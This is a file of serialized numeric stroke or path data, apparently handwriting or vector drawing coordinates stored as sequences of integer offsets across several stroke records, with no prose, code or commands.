0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 1 0,-1-1 0,0-2 0,-1 1 2,1 1-1,-1-1 1,0 0-1,0 0 1,0 1-1,0-1 1,0 1-1,0-1 0,-1 1 1,1 0-1,0 0 1,-1 0-1,-2-1 1,-53-1 194,51 3-152,1 0 35,-1 1 0,1-1 0,0 1 0,0 0 0,-1 1 0,1-1 0,0 1 0,1 0 1,-1 1-1,0 0 0,0 0 0,1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,-7 10 0,9-9-57,0 0 0,0 0 0,0 1-1,1-1 1,0 1 0,0-1 0,1 1 0,-1 0-1,1 0 1,0 10 0,2-4-35,1 0 0,0-1 0,1 0 1,0 0-1,1 0 0,0 0 0,1 0 0,0-1 0,1 0 0,0 0 1,1 0-1,11 13 0,-15-21 23,0 1 1,0-1-1,0 0 1,0 0 0,0 0-1,1-1 1,-1 1-1,1-1 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0-1-1,7 1 1,65-3-1215,-38 0-1719,4-5-2979,-32 2 3446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1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50 988,'3'-9'3934,"5"16"-1365,3 18-1383,-22 62 583,0-45-1327,0-6-123,13-23 352,3-26 748,1-5-1248,-2 9-116,-1 1 0,0-1 0,0 0-1,-1 0 1,3-14 0,5-19-47,-5 28 7,-4 14-13,-1-1 1,1 0-1,0 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0-2 0,13-20 14,-12 22-16,0-1-1,1 0 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1 0 1,1 0 0,0 0-1,0 0 1,0 0-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1-1,0 1 1,0 0 0,3 0-1,-3 0 3,-1-1 1,1 1-1,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,2-1-1,8-6 17,0 3-15,-6 2-4,-4 2 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,-1-1 0,1 1 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 1-1,1-1 1,0 1 0,0-1 0,-1 1-1,1-1 1,2 3 0,-2-2-4,-2-1 5,1-1-1,-1 1 0,1 0 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 0 0,-1 0 1,0 1-1,1-1 0,-1 0 0,0 0 1,1 1-1,-1-1 0,0 0 0,1 1 1,-1-1-1,0 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,-1-1 0,1 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 1,-1-1-1,1 1 0,-9 31 230,7-25-180,-9 41 173,7-41-185,-3 9 152,7-15-21,-9-2 1409,29-20-1324,-17 17-223,0 0-1,0 0 1,1 0 0,-1 1-1,1-1 1,-1 1-1,7-4 1,18-11-60,-21 13 15,0 0 0,0 1-1,0-1 1,1 2 0,14-6-1,-20 8 22,0 1-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 0,-1 1 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,0 1 0,0 0 1,3 3-1,5 6-9,-8-8 6,1-1 0,-1 1 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 4 0,7 26 19,-8-32-22,1 0 1,-1 0 0,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0-1-1,-1 1 1,1 0 0,-1 0-1,0 0 1,-5 17 2,4-9-45,0 0 1,0 0 0,-1 0 0,0-1-1,-8 15 1,2-10-555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2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12 448,'0'0'208,"0"-1"1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 0,0-1 1,-1 1-1,1-1 1,0 1-1,0 0 1,0-1-1,-1 1 1,1-1-1,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,-1-1 1,1 1-1,0 0 1,-1 0-1,0-1 1,1 1-137,-1 1-1,1-1 1,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1-1,0 15 395,1-5-239,-1 0 0,-1 0 1,0 0-1,0 0 0,-6 21 0,-4 40 579,4-39-278,6-27-387,0 1 0,0-1 0,-1 0 0,1 0 0,-2 0 0,-2 8 0,-1 6 290,17-11-67,35-11 65,-13 1-497,-28 2 60,-1 0 0,1 1-1,0-1 1,-1 1 0,1 0 0,6 5-1,-10-6 15,1 1-1,-1-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 0,1-1 1,-1 1-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 3 0,-1-1 42,0-1 0,-1 1 0,1-1-1,-1 1 1,0-1 0,0 0 0,0 0 0,0 0-1,-1 0 1,1-1 0,-4 4 0,-9 13 485,11-15-457,1 1 0,0-1 0,-1 0-1,0-1 1,0 1 0,0-1-1,0 1 1,-1-1 0,1-1 0,-1 1-1,1-1 1,-1 1 0,0-1 0,0-1-1,-10 3 1,-2 0-67,1-1 1,-1-1-1,-30 0 0,17-7 90,7 2-686,10 6-2686,8 1 2399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85 128 1056,'0'-2'212,"1"0"-1,-1 1 1,1-1-1,-1 1 1,1-1-1,0 0 0,-1 1 1,1-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,2-1 1,-1 1-171,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1-1 1,-1-2 0,2-1 64,1 0 0,-1 0 0,0 0 0,1 0 0,0 0 0,0 1 0,1 0 0,-1-1 1,1 1-1,0 0 0,5-3 0,-9 6-69,0 1 1,1 0-1,-1-1 1,0 1-1,1-1 1,-1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1 0 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 1,0 1-1,0-1 1,-1 1-1,1-1 1,0 1-1,0 0 1,-1-1-1,1 1 1,0-1-1,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1-1 0,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 1-1,-5-1 177,-1 1 0,1 0 0,0 0 0,0 1 0,-1 0 0,1 0-1,0 0 1,1 1 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0-1,0 1 1,1 0 0,0 0 0,0 0 0,-6 9 0,2-4-13,7-10-184,0 1 0,0 0 0,0 0 0,1-1 1,-1 1-1,0 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 3 1,-6 16 189,6-20-203,-1 1 0,1-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,-1 0-1,1-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 1,-1 0-1,0-1 1,1 1-1,-1-1 1,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,2 0 1,6 12 96,-8-12-97,1 0 1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,2 0 0,5 4-246,10 5 402,0 0 1,26 8-1,-3-9-2662,3-13-5709,-34-1 5441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0 370 1420,'0'0'2310,"11"6"-374,-10-4-1855,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 1,1 0-1,-1-1 0,1 1 0,2 1 0,36 14 227,-35-15-256,1 0 0,-1-1 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 0 0,-1 0 0,1 0 0,-1-1-1,0 1 1,1-1 0,-1-1 0,0 1 0,6-5-1,8-5 434,0 0 0,23-21-1,-41 32-398,1 0 0,-1 0 0,0 0 0,0 0-1,0-1 1,0 1 0,1 0 0,-2 0 0,1-1-1,0 1 1,0 0 0,0-1 0,-1 1 0,1-1 0,-1 1-1,1-1 1,-1 0 0,1 1 0,-1-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,0-1 0,0-2-1,-4-7 576,5 10-647,0 1-1,0-1 1,0 0 0,0 1 0,0-1 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,-1 0 0,1-1 0,-1 1-1,1-1 1,-1 1 0,1 0 0,-1 0 0,0-1 0,-6-3 160,-1-1-47,1 1-1,-1 0 1,0 1 0,-13-5-1,17 8-115,1-1 0,-1 1 0,1-1 0,0 1-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 1-1,1 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,-6 4-1,-10 5 10,13-7-22,1-1 0,-1 1-1,1 0 1,0 0-1,0 0 1,0 0-1,1 1 1,-1 0-1,1 0 1,0 1 0,0-1-1,0 1 1,0 0-1,1 0 1,0 0-1,-4 10 1,5-11-18,-1 4-62,0-1-1,1 1 0,0 0 1,0 0-1,0 12 1,2-19-17,0 1 1,0-1-1,0 0 1,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 1-1,1-1 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,0 0-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0-1-1,0 1 1,1 0-1,0-1 1,11-3-547,0 0 0,0 0 0,0-1 0,0-1 0,-1 0 0,0-1 0,0 0 0,-1-1 0,1 0 0,12-13 0,-6 4 280,0-1 1,-2-1 0,0-1 0,25-40 0,-36 51 654,-1-1-1,0 0 1,0 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,0-17 0,0-50 4264,-2 53 886,11 50-3851,-1 8-1136,-8-29-430,0 0 1,-1 0-1,1 0 0,-1 1 0,0-1 1,1 9-1,0-3-18,0 0-1,0-1 1,1 1 0,0-1 0,0 1 0,9 15 0,-5-10-37,-3-7 40,19 39-2551,-19-40 906,0-1 0,1 0 0,-1-1 0,1 1 0,9 7 0,-3-2-1091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65 252,'-1'5'7183,"0"-4"-7145,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 1 0,0 0 0,1 38 412,0-33-368,0 0 0,-1 0-1,0 0 1,0 1 0,-1-1 0,-1 9 0,-16 91 667,12-62-788,9-29 448,-2-15-361,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 0 0,1 0-1,-1-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0-1 1,1 1 0,-1 0 0,0 0 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,0-1 0,0 1-1,0 0 1,1 0 0,-1-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0 0 0,0-1 0,14-53 861,-3 25-840,1 1 1,17-31-1,4-6-48,-29 56 10,2 0-1,-1 1 1,1 0-1,0 1 1,0-1 0,12-9-1,6-8 35,-21 22-60,1 0-1,-1 0 1,0 1-1,1-1 1,0 1-1,0 0 1,-1 0-1,1 1 1,0-1 0,1 1-1,-1 0 1,0 0-1,0 0 1,7 0-1,-10 1-3,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 2 0,0 0-8,1 1-1,-1 0 0,0-1 0,-1 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,0-1 0,1 0 1,-1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1-1 0,-5 6 1,-19 20 178,-34 30 1,51-51-642,0 1 0,-1-2 1,0 0-1,0 0 0,0-1 1,-1 0-1,-18 6 0,21-11-505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6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51 115 1148,'-12'6'2140,"11"-5"-2055,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 2 0,23 38 1291,-19-39-1240,0 0 0,0 0-1,0 0 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,1-1-1,-1 0 1,0 0 0,0-1-1,1 1 1,-1-1 0,0 0-1,5-2 1,15-8 676,-19 9-594,-1 0 0,0 1 0,-1-2 0,1 1 0,0 0 0,0-1 0,-1 1 0,7-7 0,11-20 1006,-20 26-1108,0 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,-1 0 0,0-3 0,1-1 226,0 5-278,0 0 0,0-1-1,-1 1 1,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 1-1,-1-1 1,-2-1 0,-21-30 526,16 27-463,-11-5 38,19 11-150,-1 0-3,-7 0-6,6 0-9,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1-1,0 0 1,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-3 4 0,-10 11-41,8-13 28,3-3 9,0 0 1,1 0 0,-1 0 0,0 0 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,0 0 0,1 0 0,0 0-1,-2 6 1,-1 13-75,3-21 52,1 0 1,-1 0 0,1 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,1 0 0,-1 1-1,0-1 1,0 0 0,0 1 0,1-1 0,-1 0-1,1 1 1,-1-1 0,1 0 0,-1 0-1,1 1 1,0 0 0,9 18-2284,-10-19 2002,0 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,1 0 1,-1 0-1,1 0 0,0 1 1,-1-1-1,1 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,0 1 0,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,0 0-1,0 0 1,1 0-1,1-1 0,8 1-2286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19 1436,'0'-3'691,"1"-10"4096,-1 13-4742,0 0 0,1 0 0,-1 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 1 0,1 3 154,0 0 1,0 0-1,-1 1 1,1-1-1,-1 1 1,0-1-1,0 0 1,-1 6-1,0 0 111,-10 63 194,11-64-495,0-7-15,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,1 0 1,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,2 1 0,6 5-824,4-2-1667,-1-13-3982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0 972,'0'2'5576,"0"2"-4395,2 3-975,1 0 0,-1-1-1,1 1 1,1-1 0,6 10 0,0-3-87,-8-10-127,0 0 0,1 0 0,-1 0 0,1 0 0,0 0-1,0-1 1,0 1 0,0-1 0,4 2 0,-4-2-111,0 0-1,1-1 1,-1 1-1,0-1 1,1 0-1,-1 0 1,1 0 0,6 0-1,-6-1-249,0 0-1,-1-1 1,1 0-1,0 1 1,0-1-1,-1 0 1,1-1 0,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 0-1,0 0 1,0-1 0,4-3-1,4-5-1030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 1128,'0'0'1194,"-32"19"3223,-31 53-1330,9 0-1019,32-42-1516,19-25-493,-1 0 0,1 0 1,-1 0-1,-1 0 0,-8 7 0,12-11-47,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1 1 0,-11 14 90,9-14-106,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1 0 1,1 0-1,-1 4 0,-11 16-573,11-10-1232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1 504,'-43'25'7249,"27"-11"-6550,1 2-1,1-1 1,0 2 0,1 0 0,1 0 0,1 1 0,0 1 0,1 0-1,-12 34 1,11-3 245,10-46-907,0 0 0,1 0-1,-1 0 1,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0-1,0 0 1,2 8 0,3 19 87,-5-28-125,-1 0 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1-1,0 1 1,1-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0-1-1,4 4 1,32 23-1004,-28-20-941,-3-4-763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86 796,'-1'1'60,"1"-1"1,-1 0-1,0 0 0,1 1 0,-1-1 1,0 1-1,1-1 0,-1 0 1,1 1-1,-1-1 0,1 1 0,-1-1 1,1 1-1,0 0 0,-1-1 0,1 1 1,-1-1-1,1 1 0,0 0 1,0-1-1,-1 1 0,1 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 1,0 0-1,1 0 0,-1-1 1,0 1-1,0-1 0,1 1 0,-1 0 1,1-1-1,-1 1 0,0-1 0,1 1 1,0 0-1,5 15 654,-6-14-660,1 1 0,0-1 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,0 0-1,-1-1 1,1 1 0,0-1 0,0 1 0,0-1 0,1 0-1,-1 0 1,0 0 0,0 0 0,1 0 0,-1 0-1,0-1 1,1 1 0,4 0 0,-3 0-10,0 0 0,0 0 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 0-1,0 0 1,0 0 0,0-1 0,-1 1 0,1-1 0,5-3 0,26-19 262,8-6 539,-41 27-758,0 1 0,0 0 0,-1 0 1,1-1-1,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 1,0-1-1,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0-4 1,0 4 12,-1 0 0,0 1 0,1-1 1,-1 0-1,-1 0 0,1 1 0,0-1 1,-1 1-1,1-1 0,-1 1 0,0-1 1,1 1-1,-1 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 1 0,-1-1 1,1 1-1,-1-1 0,0 1 0,1 0 1,-6-2-1,5 2-69,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,-1 1 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 1,0 0-1,-1 1 0,1-1 1,0 1-1,-5 3 0,-23 15-4,26-17-61,0 0 0,1-1 0,-1 2 0,1-1 0,-1 0 0,1 1 0,0 0 0,-6 8 0,-19 26-6839,27-32 4167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60 516,'-10'7'6786,"9"5"-5895,1-11-829,-1 1 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,1 0-1,0-1 1,-1 1-1,1 0 1,0 0-1,0-1 1,0 1-1,0-1 1,2 2-1,8 4 316,-5-2-287,1-1 1,-1-1-1,1 1 1,0-1-1,0 0 1,0-1 0,0 0-1,14 3 1,-18-2-93,-3-3 3,0 0-1,0 0 0,0 1 1,1-1-1,-1 0 1,0 0-1,0 1 0,0-1 1,0 0-1,1 0 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 1 1,-1-1-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 1,0-1-1,0 1 0,1 0 1,-1 0-1,0 0 1,0 0-1,1-1 0,-1 1 1,4-2 9,-2 2 83,0-1 0,0 1 0,0-1 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1-1,-1 1 1,3-3 0,-1-2 29,-2 5-117,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0-2 0,1-11 7,-1 11-8,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1-1,0 1 1,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,-1 0 0,-1-4-1,1 5 48,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1-1,0 1 1,1-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-2 0,-32-17 1694,-3 9-1508,30 14-282,0 1 0,0-1 0,0 1 0,0 0 0,1 0 1,-1 1-1,1-1 0,0 1 0,0 0 0,1 0 0,-1 1 1,1-1-1,0 0 0,1 1 0,-1 0 0,1 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,0 11 0,-4-3-823,1-8-1130,2 4-5413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47 236,'24'-30'6410,"-23"29"-6189,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0 0 1,1-1-1,-1 1 0,1 0 0,1-1 0,-2 2-115,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 1,-1 1-1,2 0-83,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,1 3 0,3 21 77,-4-18-213,-1 0 1,1-1-1,0 1 0,1 0 0,-1 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,7 7 1,-11-12-9,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0-1 1,-1 1 0,1 0 0,-1 0-1,1 0 1,0-1 0,-1 1-1,2-1 1,13-9-8712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93 532,'8'32'6081,"13"-4"-4366,-14-20-1605,1-1 0,0-1 0,1 1 0,14 7 0,-21-13-99,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 0 0,0 1 0,3-2 0,29-21 35,-32 22-41,1-1 1,-1 0-1,0 0 0,1 0 0,-1-1 1,0 1-1,0 0 0,-1-1 0,1 0 1,0 1-1,-1-1 0,1 0 0,-1 1 0,0-1 1,0 0-1,0 0 0,-1 0 0,1 0 1,0-4-1,4-9 222,-5 15-213,0 1-1,1 0 1,-1-1 0,0 1 0,0-1 0,0 1 0,1 0-1,-1-1 1,0 1 0,0-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0-1 0,0 1 0,0-1 0,0 1-1,0 0 1,0-1 0,0 1 0,0-1 0,0 1 0,-1 0-1,1-1 1,0 1 0,0-1 0,0 1 0,-1 0 0,1-1-1,0 1 1,0 0 0,-1-1 0,1 1 0,0 0 0,-1-1-1,1 1 1,0 0 0,-1-1 0,-10-30 1049,8 27-970,0-1 0,0 1 0,-1 0 0,1 0 1,-1 1-1,0-1 0,0 1 0,0 0 0,0 0 1,-1 0-1,1 0 0,-1 1 0,0 0 0,0 0 0,0 0 1,-7-1-1,8 2-92,1 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1-1 0,0 1 0,0 1 0,0-1 0,-2 5 0,3-3-60,-1-1-1,0 1 1,0-1 0,-1 1-1,1-1 1,-1 0 0,-3 7-1,-5 10-964,7-9 391,2-9 287,1-1-1,0 1 1,-1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,-1 0 0,1 0 0,-4 3 0,-4 2-1830,8 4-132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1860,'0'-1'70,"0"1"-1,0 0 1,0 0-1,0 0 1,-1 0-1,1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,6 12 4769,-7 12-3257,1-8-875,0 0 0,0 0-1,2 0 1,6 29-1,2 35 394,-3-51-929,-6-19-138,1 0 0,0 0 0,1-1 0,0 1 0,1-1 0,9 17 0,4 7 3,-16-30-24,0 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 1,7 6-1,8 10-92,7 4-3547,-13-27-5275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25 380,'-6'1'930,"12"-7"409,-6 5-965,2-17 3328,3 18-3201,-5 0-374,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-8 11-32,7-12-93,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 0,1 1 1,0-1-1,-1 0 1,1 1-1,-24 47 77,15-30-62,6-14-16,0 1 0,0-1 1,1 1-1,-1 0 0,1 0 1,1 0-1,-1 0 1,0 9-1,-9 50 30,0-15 217,11 2 1281,1-51-1524,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 